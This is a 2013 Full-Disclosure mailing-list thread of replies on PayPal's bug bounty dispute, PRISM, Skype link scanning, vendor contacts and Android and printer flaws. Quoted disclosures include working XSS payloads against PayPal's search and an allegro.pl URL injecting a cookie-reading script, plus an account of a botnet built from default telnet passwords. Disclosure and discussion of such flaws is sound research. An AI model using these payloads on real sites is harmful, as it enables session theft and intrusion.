this right. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PAYPAL BUG BOUNTY PROGRAM 2013 - UPDATES TRANSPARENCY
On Thu, Jun 13, 2013 at 3:54 PM, Vulnerability Lab resea...@vulnerability-lab.com wrote: Today is a great day! All the wishes around the bug bounty program came up yesterday with a cool update. PayPal Inc splitted the bug bounty program in 2 transparent information categories. Its available to list researchers in each of the 4 quarters of the year. The policy and details of the program became a full update. Check it out ;) Honorable Mention: 2013-Q1 PayPal would like to recognize everyone else who contributed a valid submission in Quarter 1, 2013. We appreciate all efforts and contributions to our Bug Bounty Program. URL: https://www.paypal.com/webapps/mpp/security-tools/wall-of-fame-honorable-mention Bug Bounty Wall of Fame: 2013-Q1 PayPal would like to recognize our top 10 researchers for Quarter 1, 2013. We will update this page quarterly to reflect the efforts of our researcher community. We have listed our top 10 researchers below in alphabetical order along with their specified organization. Thank you for all of your efforts in keeping PayPal the safer way to pay online. URL: https://www.paypal.com/webapps/mpp/security-tools/wall-of-fame Robert Kugler did not make the top ten list or the honorable mention list. Kugler is the fellow who was denied a bounty because he was too young. Transparent lies have no value. Transparency or not, PayPal has no credibility. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Why PRISM kills the cloud | Computerworld Blogs
On Mon, Jun 10, 2013 at 9:15 PM, laurent gaffie laurent.gaf...@gmail.com wrote: Why is the Prims program such a big deal today? Most of us knew about echelon and the patriot act didn't we? This program was unconstitutional at the first place and should have raised indignation when it was approved at that time... +1. Below is my standard verbiage on clouds and backups to clouds. Jeff clouds and drop boxes. If you don’t want your data analyzed, inspected, shared, or mishandled, then don’t provide it in the first place. Data migration includes backups, so ensure you are using the proper attributes on your files. For Apple systems, the file should have kCFURLIsExcludedFromBackupKey file property or com.apple.MobileBackup extended attribute (see Technical QA QA1719 for details). Android applications should add android:allowBackup on the application tag and set it to false in AndroidManifest.xml. Windows’ integrated cloud backup is new, and there’s currently no way for an application to back up to the cloud (and hence, no way to stop it). A layman’s analysis of License Agreements and Terms and Conditions will reveal how little security is afforded to your documents in cloud storage. For those who don’t read them, one popular platform has 142 separate documents covering Terms of Conditions for its cloud alone.[18] The documents discuss your rights if the company (1) gives away your data, (2) shares you data with partners, (3) looses your data, (4) provides your data to authorities (sometimes without an order or warrant), (5) does not provide reasonable skill or care, (6) commits willful misconduct or fraud, and (7) acts with negligence or gross negligence. “Your rights” is misleading since it is consent, and the document effectively states you indemnify the company: “You agree to defend, indemnify and hold [company], its affiliates, subsidiaries, directors, officers, employees, agents, partners, contractors, and licensors harmless from any claim or demand, including reasonable attorneys’ fees, made by a third party.”[19] [18] iCloud Terms and Conditions, https://www.apple.com/legal/internet-services/icloud/ww/ [19] iCLOUD TERMS AND CONDITIONS, https://www.apple.com/legal/internet-services/icloud/en/terms.html Le 2013-06-10 19:46, Ivan .Heca ivan...@gmail.com a écrit : http://m.blogs.computerworld.com/cloud-storage/22305/why-prism-kills-cloud ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PayPal.com XSS Vulnerability
Hi James, I guess the email from ebay sorta makes it all moot anyway. Its interesting how the reason code changed. On May 24 the reason was Kugler was too young; and then on May 29 the reason was the flaw was previously reported. It sounds like PayPal is lying to bring this to an end; and they've lost more credibility. Jeff On Wed, May 29, 2013 at 9:22 AM, James Condron ja...@zero-internet.org.uk wrote: Ah, but then don't forget that in a contract (which this most certainly is not- but the parallels are there) ambiguity benefits the party which didn't draft the document. If its reasonable to infer a payment, and reasonable to fail to infer an age range, I think its reasonable to get paid for it. I guess the email from ebay sorta makes it all moot anyway. On 29 May 2013, at 13:33, Julius Kivimäki julius.kivim...@gmail.com wrote: Well, they don't exactly state that they're going to pay you either. 2013/5/29 Źmicier Januszkiewicz ga...@tut.by Hmm, interesting. For some reason I fail to find the mentioned age requirements at the official bug bounty page located at https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues Am I looking in the wrong direction? Can someone please point to where this is written? With kind regards, Z. 2013/5/29 Robert Kugler robert.kugle...@gmail.com 2013/5/29 Jeffrey Walton noloa...@gmail.com On Fri, May 24, 2013 at 12:38 PM, Robert Kugler robert.kugle...@gmail.com wrote: Hello all! I'm Robert Kugler a 17 years old German student who's interested in securing computer systems. I would like to warn you that PayPal.com is vulnerable to a Cross-Site Scripting vulnerability! PayPal Inc. is running a bug bounty program for professional security researchers. ... Unfortunately PayPal disqualified me from receiving any bounty payment because of being 17 years old... ... I don’t want to allege PayPal a kind of bug bounty cost saving, but it’s not the best idea when you're interested in motivated security researchers... Fortunately Microsoft and Firefox took a more reasonable positions for the bugs you discovered with their products. PCWorld and MSN picked up the story: http://www.pcworld.com/article/2039940/paypal-denies-teenager-reward-for-finding-website-bug.html and http://now.msn.com/paypal-denies-reward-to-robert-kugler-teen-who-found-bug-in-code . It is now news worthy to Wikipedia, where it will live forever under Criticisms (unfortunately, it appears PayPal does a lot of questionable things so its just one of a long list). Jeff Today I received an email from PayPal Site Security: Hi Robert, We appreciate your research efforts and we are sorry that our age requirements restrict you from participating in our Bug Bounty Program. With regards to your specific bug submission, we should have also mentioned that the vulnerability you submitted was previously reported by another researcher and we are already actively fixing the issue. We hope that you understand that bugs that have previously been reported to us are not eligible for payment as we must honor the original researcher that provided the vulnerability. I would also mention that in general, PayPal has been a consistent supporter of what is known as “responsible disclosure”. That is, ensuring that a company has a reasonable amount of time to fix a bug from notification to public disclosure. This allows the company to fix the bug, so that criminals cannot use that knowledge to exploit it, but still gives the researchers the ability to draw attention to their skills and experience. When researchers go down the “full disclosure” path, it then puts us in a race with criminals who may successfully use the vulnerability you found to victimize our customers. We do not support the full disclosure methodology, precisely because it puts real people at unnecessary risk. We hope you keep that in mind when doing future research. We acknowledge that PayPal can do more to recognize younger security researchers around the world. As a first step, we would like you to be the first security researcher in the history of our program to receive an official Letter of Recognition from our Chief Information Security Officer Michael Barrett (attached, will follow up with a signed copy tomorrow). We truly appreciate your contribution to helping keep PayPal secure for our customers and we will continue to explore other ways that we can we provide alternate recognition for younger researchers. We'd welcome the chance to explain this all to you first hand over the phone, please email us at this address with a number and good time to reach you and we’d be happy to follow-up. Thank you, PayPal Site Security It's still curious that they only mentioned the first researcher who previously found the bug after all the media attention...Nevertheless I appreciate their intentions to acknowledge also younger security researchers
Re: [Full-disclosure] PayPal.com XSS Vulnerability
On Tue, May 28, 2013 at 8:26 AM, Dan Kaminsky d...@doxpara.com wrote: So there's this pile of law around the world around work and kids; it's a rather recent development that 18 year olds can find problems that multibillion dollar interests are willing to pay bounties for. I'm probably splitting hairs here, but there appears to be a cultural bias built in. At 17+, Robert would have been of age if he was Japanese under Kazoe year-counting. The laws are all trying to protect you from being made to pick berries or sew t-shirts instead of going to class and playing outside. The humor was not lost upon me that politicians and lawyers are trying to legislate morality. How ironic! FTW: https://www.google.com/search?q=teenage+science+competition? Jeff On Fri, May 24, 2013 at 9:38 AM, Robert Kugler robert.kugle...@gmail.com wrote: Hello all! I'm Robert Kugler a 17 years old German student who's interested in securing computer systems. I would like to warn you that PayPal.com is vulnerable to a Cross-Site Scripting vulnerability! PayPal Inc. is running a bug bounty program for professional security researchers. https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues XSS vulnerabilities are in scope. So I tried to take part and sent my find to PayPal Site Security. The vulnerability is located in the search function and can be triggered with the following javascript code: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//; alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//-- /SCRIPT'SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPT https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search Screenshot: http://picturepush.com/public/13144090 Unfortunately PayPal disqualified me from receiving any bounty payment because of being 17 years old... PayPal Site Security: To be eligible for the Bug Bounty Program, you must not: ... Be less than 18 years of age.If PayPal discovers that a researcher does not meet any of the criteria above, PayPal will remove that researcher from the Bug Bounty Program and disqualify them from receiving any bounty payments. I don’t want to allege PayPal a kind of bug bounty cost saving, but it’s not the best idea when you're interested in motivated security researchers... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PayPal.com XSS Vulnerability
On Tue, May 28, 2013 at 10:47 AM, Kirils Solovjovs kirils.solovj...@kirils.com wrote: I suppose PayPal just wants to stay clear of any possible legal trouble/issues/complications. It's easier that way. Well, I suppose they are going to fix the issue pointed out by Kugler (and the additional issues from Parker). Do you think PayPal trolls lemonade stands run by children and takes their lemonade without paying to avoid possible legal problems? Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PayPal.com XSS Vulnerability
On Fri, May 24, 2013 at 12:38 PM, Robert Kugler robert.kugle...@gmail.com wrote: Hello all! I'm Robert Kugler a 17 years old German student who's interested in securing computer systems. I would like to warn you that PayPal.com is vulnerable to a Cross-Site Scripting vulnerability! PayPal Inc. is running a bug bounty program for professional security researchers. ... Unfortunately PayPal disqualified me from receiving any bounty payment because of being 17 years old... ... I don’t want to allege PayPal a kind of bug bounty cost saving, but it’s not the best idea when you're interested in motivated security researchers... Fortunately Microsoft and Firefox took a more reasonable positions for the bugs you discovered with their products. PCWorld and MSN picked up the story: http://www.pcworld.com/article/2039940/paypal-denies-teenager-reward-for-finding-website-bug.html and http://now.msn.com/paypal-denies-reward-to-robert-kugler-teen-who-found-bug-in-code. It is now news worthy to Wikipedia, where it will live forever under Criticisms (unfortunately, it appears PayPal does a lot of questionable things so its just one of a long list). Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PayPal.com XSS Vulnerability
Hi Robert, Unfortunately PayPal disqualified me from receiving any bounty payment because of being 17 years old... Interesting. The Bug Bounty page (https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues) does not state there's an age restriction or minimum. It appears PayPal is sending the message that its best to sell the bug privately, rather than participate in responsible disclosure (despite what their Bug Bounty page states). Has anyone written about the issue? For example, an established researcher? I'd like to see homage paid on PayPal's wikipedia page (wikipedia has some rules about citing sources, so the person writing would have to meet criteria). Sorry to hear about the crappy treatment. Jeff On Fri, May 24, 2013 at 12:38 PM, Robert Kugler robert.kugle...@gmail.com wrote: Hello all! I'm Robert Kugler a 17 years old German student who's interested in securing computer systems. I would like to warn you that PayPal.com is vulnerable to a Cross-Site Scripting vulnerability! PayPal Inc. is running a bug bounty program for professional security researchers. https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues XSS vulnerabilities are in scope. So I tried to take part and sent my find to PayPal Site Security. The vulnerability is located in the search function and can be triggered with the following javascript code: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//; alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//-- /SCRIPT'SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPT https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search Screenshot: http://picturepush.com/public/13144090 Unfortunately PayPal disqualified me from receiving any bounty payment because of being 17 years old... PayPal Site Security: To be eligible for the Bug Bounty Program, you must not: ... Be less than 18 years of age.If PayPal discovers that a researcher does not meet any of the criteria above, PayPal will remove that researcher from the Bug Bounty Program and disqualify them from receiving any bounty payments. I don’t want to allege PayPal a kind of bug bounty cost saving, but it’s not the best idea when you're interested in motivated security researchers... Best regards, Robert Kugler ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] On Skype URL eavesdropping
On Thu, May 16, 2013 at 5:41 PM, Kirils Solovjovs kirils.solovj...@kirils.com wrote: You may have read about this in another list. http://lists.randombit.net/pipermail/cryptography/2013-May/004224.html http://financialcryptography.com/mt/archives/001430.html I'd like to give out some observations and point out some not so obvious risks (as if Microsoft Skypying™ on your conversations is not enough). Requests always come from the same IP 65.52.100.214. They have referrer and user agent set to a dash -. They are always HEAD requests which immediately follow 302 redirects. They access both http and https links despite some speculations saying that they do it one way or the other. This is a relatively new phenomena that by my accounts is happening since the end of April 2013. ... Back to the point. Now that it's clear that [at least] links from users' private chats somehow magically end up at Redmond, it's obviously a privacy issue of having some usernames/password/sessions/whatever embedded in the URL. There could be legal concerns here too (if a prosecutor takes interest if folks besides the Swartz's of the world). I can't wait to see the first CFAA violation brought against interception services like these. Consider: the owner of the remote server surely did not authorize the interception service to access the site with a user's username and password. That's a clear violation of exceeding one's authority under the CFAA since the interception service had no authority from the server's owners. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Q: CVE Database with Programming Language and Failure Classification?
Hi All, Does anyone know where to find an augmented CVE database with: (1) programming language and (2) failure classification? For example, CVE-2013-3301 is the Linux kernel, written in C, and the failure is lack of parameter validation. As another example, CVE-2013-3302 would also be the Linux kernel, written in C, with a failure of race condition. (I'm very interested in aggregated data on all programs/modules written in C/C++/Objective C). Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)
On Sat, Apr 20, 2013 at 7:37 PM, Benji m...@b3nji.com wrote: Because security engineers are different to a QA department you originally suggested, and you seem to be very ideologist about the scenarios. As we've seen, Oracle's Java product has security engineers and this has not prevented flaws. Oracle is probably not a good example since it leaves known flaws in the code base. http://www.h-online.com/security/news/item/Java-7-Update-21-closes-security-holes-and-restricts-applets-1843558.html: The warnings for Java applets now come in two types: an applet that has a valid certificate generates a warning dialog with the Java logo in it and details of the applet's certificate, but an applet that is signed with an invalid certificate, is unsigned or self-signed, will generate a warning with a yellow shield and warning triangle which is designed to recommend that the applet should not be run. There is a problem though with the certificate checking; as The H reported in March, criminals were using revoked certificates as part of their attacks and the Java runtime was doing nothing to check the validity of certificates. On the latest update of Java, this has not changed either; online validation and revocation checks are still off by default. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How do I contact Vodafone Security?
On Mon, Apr 22, 2013 at 9:10 AM, Jann Horn j...@thejh.net wrote: does anyone know how I can contact Vodafone Security (preferably a Germany-specific group because I have no idea whether the issue affects people in other countries, too)? I sent a mail to secur...@vodafone.de and it didn't bounce (in case someone from Vodafone is reading this... I usually use both sec...@example.com and secur...@example.com. One is specified in an RFC (see below), the other was popularized by Microsoft around the same time the RFC was being assembled. There are few other addresses published in RFC2142 (http://www.ietf.org/rfc/rfc2142.txt). I usually try them too for good measure. You also have the Technical and Administrative contacts from the WHOIS database (http://whois.domaintools.com/vodafone.de). Well, I tried phoning them first (01721212), but the helpdesk person told me she'd need my password for that (of which I currently don't know where exactly it is). That sounds like Dell and their call routing system (Dell did the same to me a few years ago when trying to report some issues). Are they using the same outsourcing firm??? I think the extra effort to contact the company through well known email addresses and WHOIS contact is a courtesy and due diligence, so good job on that. But face it - if Vodafone were going to acknowledge or respond, it would have happened by now. So you get the 0-day effect with a free conscious. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegro.pl XSS [0-day]
On Thu, Apr 11, 2013 at 2:33 PM, Swair Mehta swairme...@gmail.com wrote: Well try the search on plantronics website.http://www.plantronics.com/us/ No body notified, I couldnt see the contact us link On the first page. Stay away from the web based stuff since their could be an obscene EULA festering there. You have well known mailboxes from RFC 2142 (as Henri pointed out) and the WHOIS database information which will provide technical and administrative contacts. Jeff On 11-Apr-2013, at 9:28 AM, Kacper Szczesniak kac...@qwe.pl wrote: Hi All! I was looking for a 19 rack mount today and found this XSS instead: http://allegro.pl/listing/listing.php?string=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E it turns out to be a custom data-headline attribute that is not properly escaped tested on Firefox 20, Chrome and others need an xss filter bypass ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [ MDVSA-2013:101 ] lynx
On Wed, Apr 10, 2013 at 1:36 PM, Peter Thoeny pete...@thoeny.org wrote: How about a sensible middle ground? Daily batches of MDVSA vulnerabilities? Sounds like a good idea - perhaps prepare one bulletin with affected components and provide links to the detailed article. I imagine the folks who prepare and send the bulletins would not mind a reduction in workload (preparing/signing/sending one bulletin vs many bulletins). On Apr 10, 2013, at 9:48 AM, Alex wrote: I agree! I hate those MDVSA spam!! On Wed, 10 Apr 2013 17:36:59 +0200, Fabian Wenk fab...@wenks.ch wrote: Hello Erik On 10.04.2013 17:16, Erik Falor wrote: On Wed, Apr 10, 2013 at 11:44:22AM +0100, Peter W-S wrote: Is it really necessary to spam the list with a separate email for every issue you want to report? Perhaps one email a week with a link to the full report would suffice? It is necessary. Waiting a week for a batched email to find out my software has vulnerabilities is not acceptable just because some people insist on reading email on their telephone. If you are using Mandriva, then you could and should subscribe directly to the announce or security mailing list there. I really prefer the step e.g. Ubuntu (and also some other Linux distribution I do not remember) have taken about 2 years ago. They stopped sending out their security announces to Bugtraq and Full-Disclosure. I would be happy if other distributions or projects, with such high volume of announces, would do the same. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] GitHub Login Cookie Failure
On Mon, Apr 8, 2013 at 12:19 PM, Chris Roussel la...@lavabit.com wrote: I installed the Import Cookies Export Cookies plugins in my firefox 20, then I signed in at github and exported my cookies, then I signed out, I cleaned all the cookies in my browser and I started it again, then I imported the cookies and I am login in without typing my passwords, I've tried this with my google account, but there is clear that when I signed out the info in the cookies was annulled, then it appears like I am signed while I am searching, but if I want to check my mail/drive I have to type my password. You might also check to see if the session identifier changes between sessions. If not, GitHub may be using static session IDs, which means they could be guessable. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fw: Fw: Justice for Molly (cops killingcivillians)
Go do illegal activities such as reverse engineering The DMCA (PUBLIC LAW 105–304) has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING). The STE exemption is in Section 1205 (i) SECURITY TESTING. Jeff On Fri, Mar 29, 2013 at 8:00 AM, Jerry dePriest jerr...@mc.net wrote: ** who made you the boss of FD? Ive seen similiar posts and bullshit like April fools jokes posing as 0-day and such. if you dont like it, move along. Go do illegal activities such as reverse engineering for 0-day exploits or holes in facebook so you can scare the rubes. man, try to do something good and I get blasted... Bryan, there is a short bridge waiting for you to take a long walk... By the looks of your myspace page you're anti social and a troll... We'll you got me. I forogt New Zeland is just another offshoot of the penal colony Austrailia used to be. You can't help it, it's in your genes... Spamming? UCE my mailings were not. They were informative, like this list is supposed to be. You liken my postings to the likes of Netdev and other assholes who truley UCE'd this list to death. btw this is the PERFECT place for this type of discussion. Who made you the fucking moderator of fd? You do a horrible job... I have been on this list since 2005... My postings are gold compared to the viri and other 'spolits people try to con people into. 1. Let's discuss how his facebook account was hacked along with others so no forensics are available. (Feds, gotta love em) 2. Let's discuss how her facebook account was hacked to say she took a bunch of pills THEN shot herself. 3. Let's discuss what a douchebag you are for downplaying something by putting it into the scope of a chain letter? That's confirmation you are in fact a true douchebag... FOAD Antisocial troll... Go remove your myspace page and maybe you wont look like such an ass, whole. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Fri, Mar 29, 2013 at 9:05 AM, Jerry dePriest jerr...@mc.net wrote: and this is pertinent to the list? another asshole that psts to the list with bullshit (in my eyes) then you go off on me for what I think is important. It appears you did not have your bowl of Cheerio's this morning Who was the young lady? Perhaps a close friend or relative? Jeff - Original Message - From: Gary Baribault To: full-disclosure@lists.grok.org.uk Sent: Monday, January 14, 2013 3:46 PM Subject: Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor I didn't know the gentleman, but have known some depressive people. There may have been other problems bothering him in his life, but spending a fortune on a lawyer to try and avoid 30 - 50 years in prison and the reputation that he would have if he ever got out is probable quite near the top of the list of things setting his mind frame and causing this unfortunate decision. The powers that be have blood on their hands and hopefully are having rather poor nights sleep these days. Personally I would be having trouble looking in the mirror for my daily shave. Gary Baribault On 01/14/2013 03:35 PM, valdis.kletni...@vt.edu wrote: On Mon, 14 Jan 2013 11:02:26 -0500, Jeffrey Walton said: On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote: https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck Above link to remove this prosecutor needs to have signatures by February 11. Its unfortunate Schwartz committed suicide over the incident. From the fine article: On his blog, Swartz had written of his history of depression. Given that, and the fact that the article doesn't mention a suicide note stating Aaron's reasons, it's not entirely clear that he in fact committed suicide over the incident. It may have been one factor out of many. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Fri, Mar 29, 2013 at 10:48 AM, Steve Wray stevedw...@gmail.com wrote: I'm not a moderator (OBVIOUSLY) but I'll just leave this here, from the list charter: quote Acceptable Content Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. /quote I'm thinking mainly Self promotion and POLITICS... avoided... all costs Its hard to avoid politics at times, especially when it involves your privacy (or lack thereof) and well being. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Port scanning /0 using insecure embedded devices
Many of them are based on Linux and allow login to standard BusyBox with empty or default credentials. Forgive my ignorance, but what does the authentication problem (or lack thereof) have to do with linux/uclibc/busybox? It seems to be a manufacturer problem (for example, Actiontec) or an integrator problem (such as Verizon or Comacast), unless I am missing something. Jeff On Sun, Mar 17, 2013 at 7:54 PM, internet census internetcensus2...@mail.com wrote: - Internet Census 2012 - Port scanning /0 using insecure embedded devices - Carna Botnet - While playing around with the Nmap Scripting Engine we discovered an amazing number of open embedded devices on the Internet. Many of them are based on Linux and allow login to standard BusyBox with empty or default credentials. From March to December 2012 we used ~420 Thousand insecure embedded devices as a distributed port scanner to scan all IPv4 addresses. These scans include service probes for the most common ports, ICMP ping, reverse DNS and SYN scans. We analyzed some of the data to get an estimation of the IP address usage. All data gathered during our research is released into the public domain for further study. The full 9 TB dataset has been compressed to 565GB using ZPAQ and is available via BitTorrent. The dataset contains: - 52 billion ICMP ping probes - 10.5 billion reverse DNS records - 180 billion service probe records - 2.8 billion sync scan records for 660 million IPs with 71 billion ports tested - 80 million TCP/IP fingerprints - 75 million IP ID sequence records - 68 million traceroute records This project is, to our knowledge, the largest and most comprehensive IPv4 census ever. With a growing number of IPv6 hosts on the Internet, 2012 may have been the last time a census like this was possible. A full documention, including statistics and images, can be found on the project page. We hope other researchers will find the data we have collected useful and that this publication will help raise some awareness that, while everybody is talking about high class exploits and cyberwar, four simple stupid default telnet passwords can give you access to hundreds of thousands of consumer as well as tens of thousands of industrial devices all over the world. No devices were harmed during this experiment and our botnet has now ceased its activity. Project Page: http://internetcensus2012.bitbucket.org/ http://internetcensus2012.github.com/InternetCensus2012/ http://census2012.sourceforge.net/ Torrent MAGNET LINK: magnet:?xt=urn:btih:7e138693170629fa7835d52798be18ab2fb847fedn=InternetCensus2012tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80% 2fannouncetr=udp%3a%2f%2ftracker.ccc.de%3a80%2fannouncetr=udp%3a%2f%2ftracker.publicbt.com%3a80%2fannounce ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Owning Samsung Android devices
[web page] ... [web page] Two different vulnerabilities can be exploited [web page] to silently install highly-privileged applications [web page] with no user interaction. The privileged [web page] applications to be installed can be embedded [web page] right inside the unprivileged application package, [web page] or downloaded on the fly from an on-line [web page] market. [web page] Another issue, different from the previous ones, [web page] allows attackers to send SMS messages without [web page] requiring any Android privilege (normally, Android [web page] applications are required to have the [web page] android.permission.SEND_SMS permission to [web page] perform this task). You might consider getting Android security involved since both appear to have remediation at the platform level. For example, Google Play may be able to do something about the first issue since its a trusted channel and should not be distributing hidden apps with malicious intent; and a confused deputy might be in play with the second. Android security can be reached through a well known email address, and Android Security Discussions (http://groups.google.com/group/android-security-discuss). My apologies if the remediations are not available at the platform. Its tough to discern when folks use Full Disclosure, Bugtraq, et al to generate traffic and press releases. Jeff On Tue, Mar 19, 2013 at 5:20 PM, Roberto Paleari robe...@greyhats.it wrote: Folks, I recently found some security vulnerabilities affecting Samsung Android phones. The bugs lie in Samsung-specific customizations and not in the Android code base. While waiting for Samsung security patches, I published an overview of the issues here: http://randomthoughts.greyhats.it/2013/03/owning-samsung-phones-for-fun-but-with.html Possible consequences are quite interesting, as the vulnerabilities allow an *unprivileged* application to perform several nefarious tasks, ranging from sending SMS messages to installing APK packages, but also including some denial-of-services and info leaks. I hope I will be able to disclose the technical details soon. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Arbitrary command execution and trivial password guessing on Brother printers
On Thu, Feb 28, 2013 at 12:55 PM, auto61149...@hushmail.me wrote: Confirmation that Brother aware of vulnerabilities no fixes planned for any printer Can find about a few tens of of thousands of Brothers printers on just Google Search ... They do it because its cost effective to do nothing for a defective product. The risk analysis equations need to be unbalanced. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] test
On Wed, Feb 27, 2013 at 11:05 PM, coderman coder...@gmail.com wrote: On Wed, Feb 27, 2013 at 3:13 AM, imipak imi...@gmail.com wrote: SMTP_ECHO_REQUEST ICMP_SOURCE_QUENCH +1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] #warning -- DICE.COM insecure passwords
On Tue, Feb 12, 2013 at 5:58 PM, Travis Biehn tbi...@gmail.com wrote: What Tim said. I think warning was writing about the public shame from having a massive pw dump not having some neckbeard expose them over using crypt on some random industry mailing list (shudders). Here is a long article on secure password storage. It is extremely exciting: http://www.cigital.com/justice-league-blog/2012/06/11/securing-password-digests-or-how-to-protect-lonely-unemployed-radio-listeners/ I got to attend that talk given at OWASP in Northern Virginia (https://www.owasp.org/index.php/Virginia, JULY 2012). John Steven and did a great job. Jeff On Tue, Feb 12, 2013 at 5:14 PM, Tim tim-secur...@sentinelchicken.org wrote: That's assuming that they didn't do the risk analysis and decide that the effort required to fix the problem (which will probably require, among other things, having every single user change their password) is worth the effort. Given that so many places have gotten hacked and pwned that the user community response is usually Meh. Another one, they may rightfully have concluded that risking public shaming is in fact a good business decision... Here's a bit of pseudocode for you Valdis: for each user: let user.new_hash = scrypt(user.old_crypt_hash) # now update authentication routine to use user.new_hash with new # nested hashing algorithm So really, there's actually not a good reason to keep a crappy hash database around. Just add a layer of good salted hashing on top. With that said, the unusual quirk of crypt being limited to 7 characters is an additional challenge, but you can start with the above steps (which immediately improves security), and then slowly transition to using scrypt alone or some variant that supports longer passwords. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ifIndex overflow (Linux Kernel - net/core/dev.c) [maybe offtopic]
The former requiring too much effort I'm not sure I agree with this statement. When Sony pissed off folks over the Playstation, countless hours were spent on the breaks and breach. Confer: http://thehackernews.com/2012/10/sony-playstation-3-hacked-with-custom.html and http://www.nbcnews.com/technology/ingame/hackers-stole-personal-data-playstation-network-123618. It does not hurt that Sony chronically drives drunk on the information superhighway. Confer: http://attrition.org/security/rants/sony_aka_sownage.html. Don't under estimate an attackers will or resolve. Jeff On Fri, Feb 8, 2013 at 6:05 AM, Daniel Corbe co...@corbe.net wrote: That would require that you have sufficient access to create pseudo-eth devices in the first place. A vector of attack which requires previous privilege escalation or which is carried out by an individual in a position of trust is wholly uninteresting. The former requiring too much effort and the latter requiring a reexamination of your interpersonal relationships. -Daniel Daniel Preussker dan...@preussker.net writes: Hi, I was looking into the net/core/dev.c from the current Kernel (previous also have this) and found out that ifIndex gets incremented by an endless loop. After creating 4 billion pseudo-eth devices I finally got it to overflow and endless loop, had to kill the kernel - fun right? General question, is this known? Daniel Preussker [ Security Consultant, Network Protocol 